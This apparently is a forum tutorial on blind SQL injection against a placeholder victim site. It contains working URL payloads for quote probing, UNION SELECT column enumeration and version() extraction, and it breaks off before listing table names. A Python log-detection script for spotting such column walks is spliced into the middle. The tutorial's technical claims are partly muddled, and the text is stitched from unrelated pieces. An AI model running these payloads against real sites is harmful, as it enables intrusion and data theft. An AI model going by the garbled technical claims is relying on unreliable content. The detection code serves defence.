So, BSQLi (blind SQL injection) is pretty much the same thing as SQLi, but you have to check whether it's exploitable in a different way, and exploit it a bit differently.
I'm going to start off by saying that BSQLi is a huge pain in the ass. And I wouldn't recommend doing it for random websites... Only those which you really want the info from.
So, to find it, you pretty much have to look anywhere you would expect SQLi to be. If you try to exploit it and the code stays in the URL when you hit enter, but it's not exploitable by SQLi, then it's exploitable by BSQLi.
Now, instead of just going until you have more than the number of columns, with BSQLi you have to keep going up 1 by 1 until you get the error. One above or one below will not give you the error, so you have to be careful not to miss it. An example would be:
Code:www.victimsite.com/index.php?page=1'
So, we go like:
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1--
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,2--
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,2,3--
So, we finally find an error at 5.
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,2,3,4,5--
Then, once you have found the number of columns, you have to try to find the vulnerable one. Again, you pretty much just have to go up one by one.
So:
Code:www.victimsite.com/index.php?page=1 UNION SELECT version(),2,3,4,5--
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,version(),3,4,5--
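Seen from the server side, the one-by-one column walk above leaves a distinctive trail in request logs. The following is an added example, not part of the original post: a small log check that groups `UNION SELECT` probes by client and reports clients that try several different column counts. The log format, client addresses and the `search.php` line are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines: "<client ip> <request target>".
SAMPLE_LOG = [
    "203.0.113.7 /index.php?page=1'",
    "203.0.113.7 /index.php?page=1%20UNION%20SELECT%201--",
    "203.0.113.7 /index.php?page=1%20UNION%20SELECT%201,2--",
    "203.0.113.7 /index.php?page=1+UNION+SELECT+1,2,3--",
    "203.0.113.7 /index.php?page=1+union+select+1,2,3,4,5--",
    "203.0.113.7 /index.php?page=1+UNION+SELECT+1,version(),3,4,5--",
    "198.51.100.4 /index.php?page=2",
    "198.51.100.4 /search.php?q=student+union+select+committee",
]

UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.*?)(?:--|#|$)", re.I | re.S)
FUNC_RE = re.compile(r"\b([a-z_][a-z0-9_]*)\s*\(", re.I)

def column_count(select_list):
    """Count top-level comma-separated items, ignoring commas inside ()."""
    depth, count = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(0, depth - 1)
        elif ch == "," and depth == 0:
            count += 1
    return count

def find_enumeration(lines, min_steps=3):
    """Return {client: report} for clients whose UNION SELECT probes use at
    least `min_steps` different column counts (the one-by-one walk)."""
    counts, funcs = defaultdict(list), defaultdict(set)
    for line in lines:
        client, _, target = line.partition(" ")
        query = unquote_plus(target.partition("?")[2])  # decode %20 and +
        m = UNION_RE.search(query)
        if not m:
            continue
        counts[client].append(column_count(m.group(1)))
        funcs[client].update(f.lower() for f in FUNC_RE.findall(m.group(1)))
    return {
        c: {"column_counts": sorted(set(n)), "functions": sorted(funcs[c])}
        for c, n in counts.items() if len(set(n)) >= min_steps
    }
```

Requiring several distinct column counts keeps a single benign query that happens to contain the words "union select" from being reported on its own.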
Now we have to guess the table names :\ Trying to get them from the information_schema is useless too; it won't display anything at all. The most common tables are: